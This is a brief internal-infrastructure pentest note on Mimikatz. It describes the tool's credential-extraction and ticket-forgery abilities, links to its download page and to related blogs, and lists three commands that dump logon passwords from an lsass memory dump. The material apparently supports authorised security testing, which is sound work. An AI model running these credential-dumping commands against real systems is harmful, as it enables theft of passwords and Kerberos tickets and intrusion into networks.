Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
Download: https://github.com/gentilkiwi/mimikatz/releases
Commands to run on lsass dump file:
- mimikatz # privilege::debug
- mimikatz # sekurlsa::minidump lsass.dmp
- mimikatz # sekurlsa::logonPasswords
Blogs:
- https://adsecurity.org/?page_id=1821
- https://www.sans.org/reading-room/whitepapers/detection/mimikatz-overview-defenses-detection-36780
- https://www.offensive-security.com/metasploit-unleashed/mimikatz/
- http://blog.gentilkiwi.com/mimikatz